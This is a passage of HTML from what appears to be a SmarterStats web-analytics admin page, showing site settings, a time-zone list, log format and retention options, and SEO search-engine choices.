           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">You have reached the maximum number of sites that your license allows. Please contact <a href='http://www.smartertools.com' target='_new'>www.smartertools.com</a> to learn how to increase the number of sites you can run concurrently.</div>
               </div>
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
   <div id="ctl00_TPH_UpdatePanel1">
   
           
<!-- HyperTabStrip -->
   <div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
       <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Options</span></span></a></li>
       <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Options</span></span></a></li>
       <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Locations</span></span></a></li>
       <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem5'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SEO Options</span></span></a></li>
   </ul>
   <input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>
   
       
</div>

       </div>
       <div id="Scrollable" class="ContentDiv">
           
   
<div id="ConfirmWindow" class="ConfirmWindow" style="display: none">
   <div id="DivConfirmContent" class="ConfirmContent">
       <div class="ConfirmNote" id="ConfirmText">
           &nbsp;
       </div>
   </div>
   <div id="ctl00_MPH_AP1_Button" class="PopupButtons">
       <div class="ButtonBarRight">
           <span id="CancelButtonWrapper">
               <div id="ctl00_MPH_AP1_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CancelPopup();; return false;"><span class="BBInner">Cancel</span></a></div>
           </span>
           <div id="ctl00_MPH_AP1_SaveButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OKPopup();; return false;"><span class="BBInner">OK</span></a></div>
       </div>
   </div>
   <span id="MessageHeaderText" style="display: none">
       Message</span>
   <input style="position: absolute; top: -1000px;" id="DeleteKeyCaptureBox" />

   <script type="text/javascript">
       function GetConfirmTitle() {
           return $('#MessageHeaderText').html();
       }
       function ShowAlert(errorMessage) {
           $('#CancelButtonWrapper').css('display', 'none');
           $('#ConfirmText').html(errorMessage).css('display', '');
       }
       function ShowConfirm(type, size) {
           var displayText = confirmationDialogKeys[type];
           if (displayText == undefined) displayText = type;
           $('#CancelButtonWrapper').css('display', '');
           $('#ConfirmText').html(displayText.replace(/\{0\}/g, size.toString()));
           $('#DeleteConfirmCount').html(size.toString());
       }
       function CancelPopup() {
           parent.ConfirmCallback(false);
           ClosePopup();
       }
       function OKPopup() {
           parent.ConfirmCallback(true);
           ClosePopup();
       }
       $('#DeleteKeyCaptureBox').live('keydown', function(evt) {
           CancelEvent(evt);
           if ($('#ConfirmWindowModal').attr('display') == 'none') return;
           if (evt.keyCode == 13 || evt.which == 13) OKPopup();
           else if (evt.keyCode == 27 || evt.which == 27) CancelPopup();
           return false;
       });
   </script>

</div>

   <div id="ctl00_MPH_UpdatePanel5">
   
           
           <a id="ctl00_MPH_btnUpdateIISImport" href="javascript:__doPostBack(&#39;ctl00$MPH$btnUpdateIISImport&#39;,&#39;&#39;)" style="display: none"></a>
           <a id="ctl00_MPH_btnRefresh" href="javascript:__doPostBack(&#39;ctl00$MPH$btnRefresh&#39;,&#39;&#39;)" style="display: none"></a>
           
<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />
               <div id='ctl00_MPH_OptionsTab' class='' >
           <span id="ctl00_MPH_OptionsTab">
                   <table id="ctl00_MPH_tblAdminMain" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtDomainName">
                   <td id="ctl00_MPH_txtDomainName_Label" class="Indent Fixed">Site Name</td><td id="ctl00_MPH_txtDomainName_Setting" class="Setting"><input name="ctl00$MPH$txtDomainName_SettingText" type="text" size="50" id="ctl00_MPH_txtDomainName_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtDomainUrl">
                   <td id="ctl00_MPH_txtDomainUrl_Label" class="Indent Fixed">Site Url</td><td id="ctl00_MPH_txtDomainUrl_Setting" class="Setting"><input name="ctl00$MPH$txtDomainUrl_SettingText" type="text" size="50" id="ctl00_MPH_txtDomainUrl_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtSiteId">
                   <td id="ctl00_MPH_txtSiteId_Label" class="Indent Fixed">Site ID</td><td id="ctl00_MPH_txtSiteId_Setting" class="Setting"><input name="ctl00$MPH$txtSiteId_SettingText" type="text" value="2" size="3" id="ctl00_MPH_txtSiteId_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_lstServer">
                   <td id="ctl00_MPH_lstServer_Label" class="Indent Fixed">Server</td><td id="ctl00_MPH_lstServer_Setting" class="Setting"><select name="ctl00$MPH$lstServer_SettingDropDown" id="ctl00_MPH_lstServer_SettingDropDown">
                       <option selected="selected" value="1">localhost</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstStatus">
                   <td id="ctl00_MPH_lstStatus_Label" class="Indent Fixed">Current State</td><td id="ctl00_MPH_lstStatus_Setting" class="Setting"><select name="ctl00$MPH$lstStatus_SettingDropDown" id="ctl00_MPH_lstStatus_SettingDropDown">
                       <option selected="selected" value="start">Started</option>
                       <option value="paused">Paused</option>
                       <option value="disabled">Disabled</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_exSettingSmarterLogs">
                   <td id="ctl00_MPH_exSettingSmarterLogs_Label" class="Indent Fixed">SmarterLog Path</td><td class=" Setting"><input name="ctl00$MPH$txtSmarterLogDirectory" type="text" value="C:\SmarterLogs\" size="40" id="ctl00_MPH_txtSmarterLogDirectory" />
                               <input type="button" value="Browse" onclick="SmarterLogBrowse()" />
                           </td>
               </tr><tr id="ctl00_MPH_lstTimeZone">
                   <td id="ctl00_MPH_lstTimeZone_Label" class="Indent Fixed">Time Zone</td><td id="ctl00_MPH_lstTimeZone_Setting" class="Setting"><select name="ctl00$MPH$lstTimeZone_SettingDropDown" id="ctl00_MPH_lstTimeZone_SettingDropDown">
                       <option value="0">(GMT-12:00) International Date Line West</option>
                       <option value="1">(GMT-11:00) Midway Island, Samoa</option>
                       <option value="2">(GMT-10:00) Hawaii</option>
                       <option value="3">(GMT-09:00) Alaska</option>
                       <option value="-2147483579">(GMT-08:00) Tijuana, Baja California</option>
                       <option value="4">(GMT-08:00) Pacific Time (US &amp; Canada)</option>
                       <option value="-2147483580">(GMT-07:00) Chihuahua, La Paz, Mazatlan - New</option>
                       <option value="10">(GMT-07:00) Mountain Time (US &amp; Canada)</option>
                       <option value="15">(GMT-07:00) Arizona</option>
                       <option value="13">(GMT-07:00) Chihuahua, La Paz, Mazatlan - Old</option>
                       <option value="25">(GMT-06:00) Saskatchewan</option>
                       <option value="30">(GMT-06:00) Guadalajara, Mexico City, Monterrey - Old</option>
                       <option selected="selected" value="20">(GMT-06:00) Central Time (US &amp; Canada)</option>
                       <option value="-2147483581">(GMT-06:00) Guadalajara, Mexico City, Monterrey - New</option>
                       <option value="33">(GMT-06:00) Central America</option>
                       <option value="35">(GMT-05:00) Eastern Time (US &amp; Canada)</option>
                       <option value="40">(GMT-05:00) Indiana (East)</option>
                       <option value="45">(GMT-05:00) Bogota, Lima, Quito, Rio Branco</option>
                       <option value="-2147483573">(GMT-04:30) Caracas</option>
                       <option value="-2147483576">(GMT-04:00) Manaus</option>
                       <option value="50">(GMT-04:00) Atlantic Time (Canada)</option>
                       <option value="55">(GMT-04:00) La Paz</option>
                       <option value="56">(GMT-04:00) Santiago</option>
                       <option value="60">(GMT-03:30) Newfoundland</option>
                       <option value="70">(GMT-03:00) Buenos Aires, Georgetown</option>
                       <option value="73">(GMT-03:00) Greenland</option>
                       <option value="65">(GMT-03:00) Brasilia</option>
                       <option value="-2147483575">(GMT-03:00) Montevideo</option>
                       <option value="75">(GMT-02:00) Mid-Atlantic</option>
                       <option value="80">(GMT-01:00) Azores</option>
                       <option value="83">(GMT-01:00) Cape Verde Is.</option>
                       <option value="90">(GMT) Casablanca, Monrovia, Reykjavik</option>
                       <option value="85">(GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London</option>
                       <option value="95">(GMT+01:00) Belgrade, Bratislava, Budapest, Ljubljana, Prague</option>
                       <option value="100">(GMT+01:00) Sarajevo, Skopje, Warsaw, Zagreb</option>
                       <option value="105">(GMT+01:00) Brussels, Copenhagen, Madrid, Paris</option>
                       <option value="110">(GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna</option>
                       <option value="113">(GMT+01:00) West Central Africa</option>
                       <option value="130">(GMT+02:00) Athens, Bucharest, Istanbul</option>
                       <option value="-2147483583">(GMT+02:00) Beirut</option>
                       <option value="-2147483582">(GMT+02:00) Amman</option>
                       <option value="135">(GMT+02:00) Jerusalem</option>
                       <option value="-2147483578">(GMT+02:00) Windhoek</option>
                       <option value="125">(GMT+02:00) Helsinki, Kyiv, Riga, Sofia, Tallinn, Vilnius</option>
                       <option value="140">(GMT+02:00) Harare, Pretoria</option>
                       <option value="115">(GMT+02:00) Minsk</option>
                       <option value="120">(GMT+02:00) Cairo</option>
                       <option value="155">(GMT+03:00) Nairobi</option>
                       <option value="145">(GMT+03:00) Moscow, St. Petersburg, Volgograd</option>
                       <option value="150">(GMT+03:00) Kuwait, Riyadh</option>
                       <option value="158">(GMT+03:00) Baghdad</option>
                       <option value="-2147483577">(GMT+03:00) Tbilisi</option>
                       <option value="160">(GMT+03:30) Tehran</option>
                       <option value="165">(GMT+04:00) Abu Dhabi, Muscat</option>
                       <option value="170">(GMT+04:00) Caucasus Standard Time</option>
                       <option value="-2147483584">(GMT+04:00) Baku</option>
                       <option value="-2147483574">(GMT+04:00) Yerevan</option>
                       <option value="175">(GMT+04:30) Kabul</option>
                       <option value="180">(GMT+05:00) Ekaterinburg</option>
                       <option value="185">(GMT+05:00) Islamabad, Karachi, Tashkent</option>
                       <option value="200">(GMT+05:30) Sri Jayawardenepura</option>
                       <option value="190">(GMT+05:30) Chennai, Kolkata, Mumbai, New Delhi</option>
                       <option value="193">(GMT+05:45) Kathmandu</option>
                       <option value="201">(GMT+06:00) Almaty, Novosibirsk</option>
                       <option value="195">(GMT+06:00) Astana, Dhaka</option>
                       <option value="203">(GMT+06:30) Yangon (Rangoon)</option>
                       <option value="207">(GMT+07:00) Krasnoyarsk</option>
                       <option value="205">(GMT+07:00) Bangkok, Hanoi, Jakarta</option>
                       <option value="225">(GMT+08:00) Perth</option>
                       <option value="210">(GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi</option>
                       <option value="227">(GMT+08:00) Irkutsk, Ulaan Bataar</option>
                       <option value="220">(GMT+08:00) Taipei</option>
                       <option value="215">(GMT+08:00) Kuala Lumpur, Singapore</option>
                       <option value="240">(GMT+09:00) Yakutsk</option>
                       <option value="230">(GMT+09:00) Seoul</option>
                       <option value="235">(GMT+09:00) Osaka, Sapporo, Tokyo</option>
                       <option value="250">(GMT+09:30) Adelaide</option>
                       <option value="245">(GMT+09:30) Darwin</option>
                       <option value="275">(GMT+10:00) Guam, Port Moresby</option>
                       <option value="255">(GMT+10:00) Canberra, Melbourne, Sydney</option>
                       <option value="270">(GMT+10:00) Vladivostok</option>
                       <option value="260">(GMT+10:00) Brisbane</option>
                       <option value="265">(GMT+10:00) Hobart</option>
                       <option value="280">(GMT+11:00) Magadan, Solomon Is., New Caledonia</option>
                       <option value="285">(GMT+12:00) Fiji, Kamchatka, Marshall Is.</option>
                       <option value="290">(GMT+12:00) Auckland, Wellington</option>
                       <option value="300">(GMT+13:00) Nuku&#39;alofa</option>

                   </select></td>
               </tr>
           </table>
                   <table id="ctl00_MPH_tblAdminCreate" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtAdminNewUserName">
                   <td id="ctl00_MPH_txtAdminNewUserName_Label" class="Indent Fixed">Site Admin Username</td><td id="ctl00_MPH_txtAdminNewUserName_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewUserName_SettingText" type="text" id="ctl00_MPH_txtAdminNewUserName_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtAdminNewPassword">
                   <td id="ctl00_MPH_txtAdminNewPassword_Label" class="Indent Fixed">Site Admin Password</td><td id="ctl00_MPH_txtAdminNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewPassword_SettingText" type="password" id="ctl00_MPH_txtAdminNewPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr>
           </table>
                   <table id="ctl00_MPH_SettingsContainer5" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_chkSeoEnabled">
                   <td id="ctl00_MPH_chkSeoEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSeoEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkSeoEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkSeoEnabled_SettingCheck" checked="checked" onclick="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$chkSeoEnabled_SettingCheck\&#39;,\&#39;\&#39;)&#39;, 0)" /><label for="ctl00_MPH_chkSeoEnabled_SettingCheck">Enable SEO</label></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_LogOptionsTab' class='' style='display:none'>
           <span id="ctl00_MPH_LogOptionsTab">
                   <table id="ctl00_MPH_SettingsContainer2" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lstLogLocation">
                   <td id="ctl00_MPH_lstLogLocation_Label" class="Indent Fixed">Log Location</td><td id="ctl00_MPH_lstLogLocation_Setting" class="Setting"><select name="ctl00$MPH$lstLogLocation_SettingDropDown" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$lstLogLocation_SettingDropDown\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_MPH_lstLogLocation_SettingDropDown">
                       <option selected="selected" value="Local">Local Path or UNC Path</option>
                       <option value="FTP">FTP</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstLogFormat">
                   <td id="ctl00_MPH_lstLogFormat_Label" class="Indent Fixed">Log Format</td><td id="ctl00_MPH_lstLogFormat_Setting" class="Setting"><select name="ctl00$MPH$lstLogFormat_SettingDropDown" id="ctl00_MPH_lstLogFormat_SettingDropDown">
                       <option selected="selected" value="auto">Auto-Detect</option>
                       <option value="W3Cex">IIS - W3Cex Log Format</option>
                       <option value="IIS">IIS - Microsoft IIS Log Format</option>
                       <option value="NCSA">IIS - NCSA Common Log Format</option>
                       <option value="ApacheCLF">Apache - Common Log Format</option>
                       <option value="ApacheNCSAEx">Apache - NCSA Extended Log Format</option>
                       <option value="IPlanetCLF">IPlanet - Common Log Format</option>
                       <option value="CLF">Other - Common Log Format</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstMonthsToKeepSmStats">
                   <td id="ctl00_MPH_lstMonthsToKeepSmStats_Label" class="Indent Fixed">Auto-Deletion</td><td id="ctl00_MPH_lstMonthsToKeepSmStats_Setting" class="Setting"><select name="ctl00$MPH$lstMonthsToKeepSmStats_SettingDropDown" id="ctl00_MPH_lstMonthsToKeepSmStats_SettingDropDown">
                       <option selected="selected" value="0">Never Delete</option>
                       <option value="1">Delete after 1 months</option>
                       <option value="2">Delete after 2 months</option>
                       <option value="3">Delete after 3 months</option>
                       <option value="4">Delete after 4 months</option>
                       <option value="5">Delete after 5 months</option>
                       <option value="6">Delete after 6 months</option>
                       <option value="7">Delete after 7 months</option>
                       <option value="8">Delete after 8 months</option>
                       <option value="9">Delete after 9 months</option>
                       <option value="10">Delete after 10 months</option>
                       <option value="11">Delete after 11 months</option>
                       <option value="12">Delete after 12 months</option>
                       <option value="13">Delete after 13 months</option>
                       <option value="14">Delete after 14 months</option>
                       <option value="15">Delete after 15 months</option>
                       <option value="16">Delete after 16 months</option>
                       <option value="17">Delete after 17 months</option>
                       <option value="18">Delete after 18 months</option>
                       <option value="19">Delete after 19 months</option>
                       <option value="20">Delete after 20 months</option>
                       <option value="21">Delete after 21 months</option>
                       <option value="22">Delete after 22 months</option>
                       <option value="23">Delete after 23 months</option>
                       <option value="24">Delete after 24 months</option>
                       <option value="25">Delete after 25 months</option>
                       <option value="26">Delete after 26 months</option>
                       <option value="27">Delete after 27 months</option>
                       <option value="28">Delete after 28 months</option>
                       <option value="29">Delete after 29 months</option>
                       <option value="30">Delete after 30 months</option>
                       <option value="31">Delete after 31 months</option>
                       <option value="32">Delete after 32 months</option>
                       <option value="33">Delete after 33 months</option>
                       <option value="34">Delete after 34 months</option>
                       <option value="35">Delete after 35 months</option>
                       <option value="36">Delete after 36 months</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_ExtensibleSetting1">
                   <td id="ctl00_MPH_ExtensibleSetting1_Label" class="Indent Fixed">Export Directory</td><td class=" Setting"><input name="ctl00$MPH$txtExportLogDirectory" type="text" size="40" id="ctl00_MPH_txtExportLogDirectory" />
                               <input type="button" value="Browse" onclick="ExportLogBrowse()" />
                           </td>
               </tr><tr id="ctl00_MPH_txtLogFileExportLocURL">
                   <td id="ctl00_MPH_txtLogFileExportLocURL_Label" class="Indent Fixed">Export Url</td><td id="ctl00_MPH_txtLogFileExportLocURL_Setting" class="Setting"><input name="ctl00$MPH$txtLogFileExportLocURL_SettingText" type="text" size="40" id="ctl00_MPH_txtLogFileExportLocURL_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_chkStripAfterSemi">
                   <td id="ctl00_MPH_chkStripAfterSemi_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkStripAfterSemi_Setting" class="Setting"><input id="ctl00_MPH_chkStripAfterSemi_SettingCheck" type="checkbox" name="ctl00$MPH$chkStripAfterSemi_SettingCheck" /><label for="ctl00_MPH_chkStripAfterSemi_SettingCheck">Enable removal of URL items after semicolon (used for jsessionid)</label></td>
               </tr><tr id="ctl00_MPH_txtDefaultDocuments">
                   <td id="ctl00_MPH_txtDefaultDocuments_Setting" class="Indent Setting" colspan="2"><span class='Label'>Default Documents (one per line)<br /></span><textarea name="ctl00$MPH$txtDefaultDocuments_SettingText" rows="4" cols="50" id="ctl00_MPH_txtDefaultDocuments_SettingText" class="text">
index.htm
index.html
default.asp
default.aspx</textarea></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_LogLocationsTab' class='' style='display:none'>
           <span id="ctl00_MPH_LogLocationsTab">
                   <span id="ctl00_MPH_ctxLogLocations">
<!-- HyperMenu -->
           <div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl02' name='ctl00$MPH$ctl02' style='z-index:800'>
               <li class='hmItem hmFirst' id='ctl00_MPH_ctl02_hm0' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Add<span class='hmArrow'></span></a>
               <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
                   <li class='hmItem hmFirst hmLast' id='ctl00_MPH_ctl02_hm0_hm0' style='z-index: 800'><a class='hmA' href='#'>Log Location</a></li>
               </ul><div class='hmScrollDown'></div></div>
               </li>
               <li class='hmItem' id='ctl00_MPH_ctl02_hm1' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
               <li class='hmItem hmLast' id='ctl00_MPH_ctl02_hm2' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
           </ul>
           <div class='hmScrollDown'></div></div>
           </div>
           </span>
                   <div id="ctl00_MPH_UpdatePanel3">
               
                           
<div class="HyperGridWrapper" id="ctl00_MPH_grdLogLocations">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdLogLocations_Table"><tr><td class="NoItems" colspan="2">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_grdLogLocations_HiddenInput" id="ctl00_MPH_grdLogLocations_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_grdLogLocations_HiddenLSR" id="ctl00_MPH_grdLogLocations_HiddenLSR" value="" />
</div>
</div>

                       
           </div>
               </span></div>
       
               <div id='ctl00_MPH_LogFTPTab' class='' style='display:none'>
           <span id="ctl00_MPH_LogFTPTab">
                   
               </span></div>
       
               <div id='ctl00_MPH_SeoOptionsTab' class='' style='display:none'>
           <span id="ctl00_MPH_SeoOptionsTab">
                   <table id="ctl00_MPH_ucSiteSeoSettings_tblSEO" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords">
                   <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_Label" class="Indent Fixed">Max Keywords</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxKeywords_SettingText" type="text" value="5" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors">
                   <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_Label" class="Indent Fixed">Max Competitors</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxCompetitors_SettingText" type="text" value="5" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking">
                   <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_Label" class="Indent Fixed">Max Position to Retrieve</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxRanking_SettingText" type="text" value="100" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText" class="text" /></td>
               </tr>
           </table>
                   <table id="ctl00_MPH_ucSiteSeoSearchEngineSettings_tblSeoSearchEngines" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines">
                   <td id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_Label" class="Indent Fixed">Search Engines</td><td id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_Setting" class="Setting"><table id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox" class="CheckboxList" border="0">
                       <tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_0" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$0" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_0">Google</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_8" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$8" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_8">Google (DE)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_15" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$15" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_15">Google (JP)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_1" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$1" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_1">Yahoo</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_9" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$9" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_9">Google (ES)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_16" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$16" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_16">Google (KR)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_2" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$2" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_2">Ask</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_10" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$10" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_10">Google (FR)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_17" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$17" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_17">Google (MX)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_3" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$3" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_3">Bing</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_11" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$11" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_11">Google (HK)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_18" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$18" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_18">Google (NL)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_4" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$4" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_4">Google (AU)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_12" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$12" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_12">Google (IN)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_19" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$19" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_19">Google (TW)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_5" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$5" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_5">Google (BR)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_13" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$13" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_13">Google (IL)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_20" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$20" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_20">Google (RU)</label></td>
                       </tr><tr>
